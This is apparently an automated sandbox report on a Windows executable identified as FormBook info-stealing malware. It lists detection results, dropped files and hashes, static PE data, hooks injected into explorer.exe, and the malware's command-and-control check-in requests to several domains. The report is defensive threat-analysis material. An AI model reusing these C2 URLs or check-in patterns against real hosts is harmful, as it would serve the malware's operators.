          [Figure: behavior graph. Behavior Graph ID: 552997; Sample: nji3Lg1ot6; Startdate: 14/01/2022; Architecture: WINDOWS; Score: 100. Process chain: nji3Lg1ot6.exe (started) -> nji3Lg1ot6.exe (started) -> explorer.exe (injected) -> msiexec.exe (started), autochk.exe (started); msiexec.exe -> cmd.exe (started) -> conhost.exe (started).]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          nji3Lg1ot6.exe | 38% | Virustotal |
          nji3Lg1ot6.exe | 42% | ReversingLabs | Win32.Worm.SpyBot
          nji3Lg1ot6.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          7.2.msiexec.exe.4baf840.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
          7.2.msiexec.exe.2c5b358.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
          1.2.nji3Lg1ot6.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.1.nji3Lg1ot6.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.0.nji3Lg1ot6.exe.400000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.nji3Lg1ot6.exe.23e0000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.0.nji3Lg1ot6.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.0.nji3Lg1ot6.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner
          www.mnbvending.com | 0% | Virustotal
          www.alibabasdeli.com | 0% | Virustotal
          shops.myshopify.com | 1% | Virustotal

          URLs

          Source | Detection | Scanner | Label
          http://www.nanasyhogar.com/nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf | 0% | Avira URL Cloud | safe
          www.rthearts.com/nk6l/ | 0% | Avira URL Cloud | safe
          http://www.alibabasdeli.com/nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf | 0% | Avira URL Cloud | safe
          http://www.gigasupplies.com/nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.mnbvending.com | 199.59.243.200 | true | false | | unknown
          www.alibabasdeli.com | 172.67.173.57 | true | true | | unknown
          nanasyhogar.com | 50.31.177.38 | true | true | | unknown
          shops.myshopify.com | 23.227.38.74 | true | true | | unknown
          www.nanasyhogar.com | unknown | unknown | true | | unknown
          www.gigasupplies.com | unknown | unknown | true | | unknown

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://www.nanasyhogar.com/nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf | true | Avira URL Cloud: safe | unknown
                www.rthearts.com/nk6l/ | true | Avira URL Cloud: safe | low
                http://www.alibabasdeli.com/nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf | true | Avira URL Cloud: safe | unknown
                http://www.gigasupplies.com/nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf | true | Avira URL Cloud: safe | unknown

                URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
                http://nsis.sf.net/NSIS_Error | nji3Lg1ot6.exe | false | | high
                http://nsis.sf.net/NSIS_ErrorError | nji3Lg1ot6.exe | false | | high

                    Contacted IPs

                    Public

                    IP | Domain | Country | ASN | ASN Name | Malicious
                    172.67.173.57 | www.alibabasdeli.com | United States | 13335 | CLOUDFLARENETUS | true
                    23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
                    50.31.177.38 | nanasyhogar.com | United States | 23352 | SERVERCENTRALUS | true

                    Private

                    IP
                    192.168.2.1

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:552997
                    Start date:14.01.2022
                    Start time:03:36:23
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 11s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:nji3Lg1ot6 (renamed file extension from none to exe)
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:21
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@8/4@4/4
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 24.2% (good quality ratio 21.8%)
                    • Quality average: 74.1%
                    • Quality standard deviation: 31.3%
                    HCA Information:
                    • Successful, ratio: 86%
                    • Number of executed functions: 94
                    • Number of non-executed functions: 57
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    Warnings:
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                    • Not all processes were analyzed, report is missing behavior information

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs


                    Domains


                    ASN


                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\nsx7FAE.tmp
                    Process:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):252172
                    Entropy (8bit):7.750682379260983
                    Encrypted:false
                    SSDEEP:6144:118MKS5foIrwbBl2/IO4cwyjICBga9xtqS+W:0MKS5pwdQIC99xtqA
                    MD5:8644B9AA55DCA97B4841D7C3878444C7
                    SHA1:1B7CD31D5C9509868830982D39D9A3F75B7E3AD4
                    SHA-256:C41772CB8BD860959A61F832E221F9DC634BEBD8FE4CD141E45321E348EB4181
                    SHA-512:2DEE50DCEDF000EC57222C3D12B30F7905B18977C929C14517A0DC2937DA7B6CFF0D7FBB093059AE5607AB3C3341C856FEACD4CFAC23C89F20EBBFD50B174513
                    Malicious:false
                    Reputation:low
                    C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll
                    Process:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):4608
                    Entropy (8bit):3.8072208508576035
                    Encrypted:false
                    SSDEEP:24:e31GSNNCc0teIAUdax/+TCA5dieD4ueeDFE8hueeYoNXs+f3SlLRQ0K7ABPnRuVL:CnC/I9GTxieBJInFbfGFN1RuqS
                    MD5:D62257B9F46BB3ECC454D94B80E839E8
                    SHA1:A33070571B7909CEB589F9CCEB8591EE2DAE5C9F
                    SHA-256:9679F0E8F63974D80F953B8212B2668C27EC9762CDCF6ACBFD4FDF4B6D189F23
                    SHA-512:065531AFC2DA7DD6CECC893C13E41A1F15E0FC670E0DDC006E6F87CF5CB7A9B94D36275D2050953A11350590AC4D1B1B5FB89ACAA3C6B1F3F6C466D5E155F907
                    Malicious:false
                    Reputation:low
                    C:\Users\user\AppData\Local\Temp\pawgjsvu
                    Process:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4769
                    Entropy (8bit):6.209190395428905
                    Encrypted:false
                    SSDEEP:96:/s3+C1lu78g/85QphY5tVXUcbaLrVJ83Z/Lj+HNdC+cR3Sc3owy8WwXfUE/gmc01:i+CW8Q85ghY5tVkcbkU3hFdowyPwPUEX
                    MD5:2CF23E8F99E539C2CFA7DF0709FFE950
                    SHA1:B0DEF49E4CA1DE39D60696FFEC5EC6ECB9399D3C
                    SHA-256:C71C94E4AA37C19EE3E62E4F20D03CE4950D9B7BCA8755B3729CBDB7897B6FDE
                    SHA-512:0A028931CFE2F89C9324BA125DDFE576051CE68AFE556700D89EB74F0EC19DDBE1AB2C2E7AE96523CE231B47A18E5DB4935EF22E68F8708BC7663060F888D11E
                    Malicious:false
                    Reputation:low
                    C:\Users\user\AppData\Local\Temp\zn2eyxxq9ww5zrdhr
                    Process:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):220020
                    Entropy (8bit):7.992864927984938
                    Encrypted:true
                    SSDEEP:6144:7MKS5foIrwbBl2/IO4cwyjICBga9xtqS+Wx:7MKS5pwdQIC99xtqAx
                    MD5:A75D055E6FABC0D24984208FC2BD8877
                    SHA1:F4071D8B3141A30FC0D70787D174B8E31C6131FC
                    SHA-256:6497E85685A07951F80AE543BB730D7714717596140569E4D5C9388F2E6CBE59
                    SHA-512:3A09EEF95C13AF84D71512DBFCDB2C6D87412844443411E2235E47797E9582A12FEA44848E1037B7C56C60E233CC2EA962E59BEE917F13C60103B2B196A51F4E
                    Malicious:false
                    Reputation:low

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Entropy (8bit):7.927911380419802
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 92.16%
                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:nji3Lg1ot6.exe
                    File size:248302
                    MD5:8eddcc35719034649f6947b2b08bcdf3
                    SHA1:5506b69b4584f43232f45299192a540ec0197998
                    SHA256:0d072a60b433f330d2ba97d75eae7af07e9d75bc6ed5b1065287661d05e82ab6
                    SHA512:c7716daafffd44dff6143d7fe0fb686eb5fc08da918aab204ae6d7c8687dc914d9310d488a2ffc4767e5fd643e8aee6d88fadf28d156c6be731c29bcc3943681
                    SSDEEP:6144:owzN+wRSsYU12O6NgFRQbIuoKFFmhmvk8nw:fN+w8KCWRbRKF7vkR

                    File Icon

                    Icon Hash:b2a88c96b2ca6a72

                    Static PE Info

                    General

                    Entrypoint:0x403225
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    DLL Characteristics:
                    Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:099c0646ea7282d232219f8807883be0

                    Entrypoint Preview

                    Instruction
                    sub esp, 00000180h
                    push ebx
                    push ebp
                    push esi
                    xor ebx, ebx
                    push edi
                    mov dword ptr [esp+18h], ebx
                    mov dword ptr [esp+10h], 00409128h
                    xor esi, esi
                    mov byte ptr [esp+14h], 00000020h
                    call dword ptr [00407030h]
                    push 00008001h
                    call dword ptr [004070B4h]
                    push ebx
                    call dword ptr [0040727Ch]
                    push 00000008h
                    mov dword ptr [00423F58h], eax
                    call 00007F1618B45960h
                    mov dword ptr [00423EA4h], eax
                    push ebx
                    lea eax, dword ptr [esp+34h]
                    push 00000160h
                    push eax
                    push ebx
                    push 0041F450h
                    call dword ptr [00407158h]
                    push 004091B0h
                    push 004236A0h
                    call 00007F1618B45617h
                    call dword ptr [004070B0h]
                    mov edi, 00429000h
                    push eax
                    push edi
                    call 00007F1618B45605h
                    push ebx
                    call dword ptr [0040710Ch]
                    cmp byte ptr [00429000h], 00000022h
                    mov dword ptr [00423EA0h], eax
                    mov eax, edi
                    jne 00007F1618B42E2Ch
                    mov byte ptr [esp+14h], 00000022h
                    mov eax, 00429001h
                    push dword ptr [esp+14h]
                    push eax
                    call 00007F1618B450F8h
                    push eax
                    call dword ptr [0040721Ch]
                    mov dword ptr [esp+1Ch], eax
                    jmp 00007F1618B42E85h
                    cmp cl, 00000020h
                    jne 00007F1618B42E28h
                    inc eax
                    cmp byte ptr [eax], 00000020h
                    je 00007F1618B42E1Ch
                    cmp byte ptr [eax], 00000022h
                    mov byte ptr [eax+eax+00h], 00000000h

                    Rich Headers

                    Programming Language:
                    • [EXP] VC++ 6.0 SP5 build 8804

                    Data Directories

                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x900 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                    Sections

                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x1000 | 0x5976 | 0x5a00 | False | 0.668619791667 | data | 6.46680044621 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.444878472222 | data | 5.17796812871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data | 0x9000 | 0x1af98 | 0x400 | False | 0.55078125 | data | 4.68983486809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .rsrc | 0x2c000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94693169534 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    Name | RVA | Size | Type | Language | Country
                    RT_ICON | 0x2c190 | 0x2e8 | data | English | United States
                    RT_DIALOG | 0x2c478 | 0x100 | data | English | United States
                    RT_DIALOG | 0x2c578 | 0x11c | data | English | United States
                    RT_DIALOG | 0x2c698 | 0x60 | data | English | United States
                    RT_GROUP_ICON | 0x2c6f8 | 0x14 | data | English | United States
                    RT_MANIFEST | 0x2c710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                    Imports

                    DLL | Import
                    KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                    USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                    GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                    SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                    ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                    COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                    ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                    VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                    Possible Origin

                    Language of compilation system | Country where language is spoken
                    English | United States

                    Network Behavior

                    Snort IDS Alerts

                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                    01/14/22-03:39:09.329226 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49819 | 80 | 192.168.2.3 | 23.227.38.74
                    01/14/22-03:39:09.329226 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49819 | 80 | 192.168.2.3 | 23.227.38.74
                    01/14/22-03:39:09.329226 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49819 | 80 | 192.168.2.3 | 23.227.38.74
                    01/14/22-03:39:09.373367 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49819 | 23.227.38.74 | 192.168.2.3

                    TCP Packets

                    UDP Packets

                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Jan 14, 2022 03:38:27.518068075 CET | 52650 | 53 | 192.168.2.3 | 8.8.8.8
                    Jan 14, 2022 03:38:27.765955925 CET | 53 | 52650 | 8.8.8.8 | 192.168.2.3
                    Jan 14, 2022 03:38:48.632225037 CET | 63297 | 53 | 192.168.2.3 | 8.8.8.8
                    Jan 14, 2022 03:38:48.656395912 CET | 53 | 63297 | 8.8.8.8 | 192.168.2.3
                    Jan 14, 2022 03:39:09.281239986 CET | 53615 | 53 | 192.168.2.3 | 8.8.8.8
                    Jan 14, 2022 03:39:09.309283972 CET | 53 | 53615 | 8.8.8.8 | 192.168.2.3
                    Jan 14, 2022 03:39:29.496071100 CET | 50728 | 53 | 192.168.2.3 | 8.8.8.8
                    Jan 14, 2022 03:39:29.602072954 CET | 53 | 50728 | 8.8.8.8 | 192.168.2.3

                    DNS Queries

                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                    Jan 14, 2022 03:38:27.518068075 CET | 192.168.2.3 | 8.8.8.8 | 0x7cdd | Standard query (0) | www.nanasyhogar.com | A (IP address) | IN (0x0001)
                    Jan 14, 2022 03:38:48.632225037 CET | 192.168.2.3 | 8.8.8.8 | 0x7e08 | Standard query (0) | www.alibabasdeli.com | A (IP address) | IN (0x0001)
                    Jan 14, 2022 03:39:09.281239986 CET | 192.168.2.3 | 8.8.8.8 | 0xd5ac | Standard query (0) | www.gigasupplies.com | A (IP address) | IN (0x0001)
                    Jan 14, 2022 03:39:29.496071100 CET | 192.168.2.3 | 8.8.8.8 | 0x1d40 | Standard query (0) | www.mnbvending.com | A (IP address) | IN (0x0001)

                    DNS Answers

                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                    Jan 14, 2022 03:38:27.765955925 CET | 8.8.8.8 | 192.168.2.3 | 0x7cdd | No error (0) | www.nanasyhogar.com | nanasyhogar.com |  | CNAME (Canonical name) | IN (0x0001)
                    Jan 14, 2022 03:38:27.765955925 CET | 8.8.8.8 | 192.168.2.3 | 0x7cdd | No error (0) | nanasyhogar.com |  | 50.31.177.38 | A (IP address) | IN (0x0001)
                    Jan 14, 2022 03:38:48.656395912 CET | 8.8.8.8 | 192.168.2.3 | 0x7e08 | No error (0) | www.alibabasdeli.com |  | 172.67.173.57 | A (IP address) | IN (0x0001)
                    Jan 14, 2022 03:38:48.656395912 CET | 8.8.8.8 | 192.168.2.3 | 0x7e08 | No error (0) | www.alibabasdeli.com |  | 104.21.30.160 | A (IP address) | IN (0x0001)
                    Jan 14, 2022 03:39:09.309283972 CET | 8.8.8.8 | 192.168.2.3 | 0xd5ac | No error (0) | www.gigasupplies.com | shops.myshopify.com |  | CNAME (Canonical name) | IN (0x0001)
                    Jan 14, 2022 03:39:09.309283972 CET | 8.8.8.8 | 192.168.2.3 | 0xd5ac | No error (0) | shops.myshopify.com |  | 23.227.38.74 | A (IP address) | IN (0x0001)
                    Jan 14, 2022 03:39:29.602072954 CET | 8.8.8.8 | 192.168.2.3 | 0x1d40 | No error (0) | www.mnbvending.com |  | 199.59.243.200 | A (IP address) | IN (0x0001)

                    HTTP Request Dependency Graph

                    • www.nanasyhogar.com
                    • www.alibabasdeli.com
                    • www.gigasupplies.com

                    HTTP Packets

                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    0 | 192.168.2.3 | 49793 | 50.31.177.38 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 03:38:27.889576912 CET | 10300 | OUT | GET /nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf HTTP/1.1
                    Host: www.nanasyhogar.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Jan 14, 2022 03:38:28.461199999 CET | 10301 | IN | HTTP/1.1 301 Moved Permanently
                    Connection: close
                    content-type: text/html; charset=UTF-8
                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                    cache-control: no-cache, must-revalidate, max-age=0
                    x-redirect-by: WordPress
                    location: https://www.nanasyhogar.com/nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf
                    content-length: 0
                    date: Fri, 14 Jan 2022 02:38:27 GMT


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    1 | 192.168.2.3 | 49808 | 172.67.173.57 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 03:38:48.677973032 CET | 12054 | OUT | GET /nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf HTTP/1.1
                    Host: www.alibabasdeli.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Jan 14, 2022 03:38:48.705641031 CET | 12055 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Fri, 14 Jan 2022 02:38:48 GMT
                    Transfer-Encoding: chunked
                    Connection: close
                    Cache-Control: max-age=3600
                    Expires: Fri, 14 Jan 2022 03:38:48 GMT
                    Location: https://www.alibabasdeli.com/nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IgjFfWdmsLKF6nMy5eaecanBpYGYtijY%2F9ML7bYbo0jwULbFmirtMXIUFdaeYKaZw0SjcZLe8AgxrbUYROuDN%2FNsw420lPpE5m2qvu%2BdTZvcH%2BD2gpXk494OMVi7AvX9wFxVMZB9xg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6cd37d8248424df4-FRA
                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                    Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    2 | 192.168.2.3 | 49819 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 03:39:09.329226017 CET | 12088 | OUT | GET /nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf HTTP/1.1
                    Host: www.gigasupplies.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Jan 14, 2022 03:39:09.373367071 CET | 12089 | IN | HTTP/1.1 403 Forbidden
                    Date: Fri, 14 Jan 2022 02:39:09 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    X-Sorting-Hat-PodId: 188
                    X-Sorting-Hat-ShopId: 60258091197
                    X-Dc: gcp-europe-west1
                    X-Request-ID: 077675b5-2854-474a-9745-e2e99dc925ce
                    X-Permitted-Cross-Domain-Policies: none
                    X-XSS-Protection: 1; mode=block
                    X-Download-Options: noopen
                    X-Content-Type-Options: nosniff
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 6cd37e035a694e0e-FRA
                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                    Code Manipulations

                    User Modules

                    Hook Summary

                    Function Name | Hook Type | Active in Processes
                    PeekMessageA | INLINE | explorer.exe
                    PeekMessageW | INLINE | explorer.exe
                    GetMessageW | INLINE | explorer.exe
                    GetMessageA | INLINE | explorer.exe

                    Processes

                    Process: explorer.exe, Module: user32.dll
                    Function Name | Hook Type | New Data
                    PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE0
                    PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE0
                    GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE0
                    GetMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE0

                    System Behavior

                    General

                    Start time:03:37:19
                    Start date:14/01/2022
                    Path:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\nji3Lg1ot6.exe"
                    Imagebase:0x400000
                    File size:248302 bytes
                    MD5 hash:8EDDCC35719034649F6947B2B08BCDF3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    General

                    Start time:03:37:20
